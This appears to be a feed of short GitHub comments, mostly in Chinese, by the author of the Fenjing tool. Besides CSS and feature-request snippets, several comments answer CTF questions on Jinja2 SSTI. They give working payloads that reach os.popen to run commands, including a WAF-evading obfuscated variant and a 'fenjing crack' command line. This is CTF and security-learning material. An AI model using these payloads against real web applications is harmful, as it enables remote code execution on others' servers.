Marven11

I have the same problem but css above doesn't work. My problem was solved by using: ```css .CodeMirror pre.CodeMirror-line, .CodeMirror-gutter, .CodeMirror-gutters, .CodeMirror-linenumber, .CodeMirror-scroll, .CodeMirror-sizer, .CodeMirror { font-size: 22px !important; line-height:...

I've mailed him several times telling him this is the fix for the CVE since I found it. Maybe he's busy, or maybe he forget, or ignore everything. We can...

Still waiting for this feature. I want to use Tailscale on my Android phone while visiting websites like YouTube and GitHub in China. To visit those websites, I need to...

好像也可以在`lipsum`上设置属性，这样不用config也能暂存一些对象了

这个不是Jinja SSTI吧... RCE的点在`eval(calc_str)`

> ctfshow平台的单身杯--ezzz_ssti题，限制pyload为40，用工具绕不过 #46 一直不知道怎么解决

这题ban了括号，没法RCE

这个应该找不出全自动的解法，如果有类似的题目不仅仅ban了花括号，可以参考[这个](https://github.com/Marven11/Fenjing/blob/main/examples.md#%E5%9C%A8%E4%B8%8D%E8%8E%B7%E5%8F%96waf%E9%BB%91%E5%90%8D%E5%8D%95%E7%9A%84%E6%83%85%E5%86%B5%E4%B8%8B%E6%A0%B9%E6%8D%AE%E8%BF%94%E5%9B%9E%E9%A1%B5%E9%9D%A2%E4%B8%AD%E7%9A%84%E7%89%B9%E5%BE%81%E7%94%9F%E6%88%90payload)把payload掰成两半提交，然后就可以全自动搜索出payload泐 但是考虑到这道题只ban了花括号，直接把`{{lipsum.__globals__.__builtins__.__import__('os').popen('ls').read()}}`分成两半提交就行，不用绕过WAF

可以跑 ```jinja {%set cq=(lipsum|escape|batch(22)|first|last)%}{%set ls=("%c"*4)%(108,115,32,63)%} {% set s= ez|attr(cq~cq~"eq"~cq~cq)|attr(cq~cq~"GLOBALS"|lower~cq~cq)|attr("GET"|lower)("sys")|attr("modules")|attr("GET"|lower)("o""s")|attr("p""open")(ls)|attr("r""ead")() %} ``` 这种错误时返回200的应该用--waf-keyword指定关键字，比如这道题就是`--waf-keyword Hacker`

```shell python -m fenjing crack --url 'http://127.0.0.1:5001' --method POST --inputs nickname --waf-keyword 'Hacker' ``` 本地能跑，你是不是复制错了？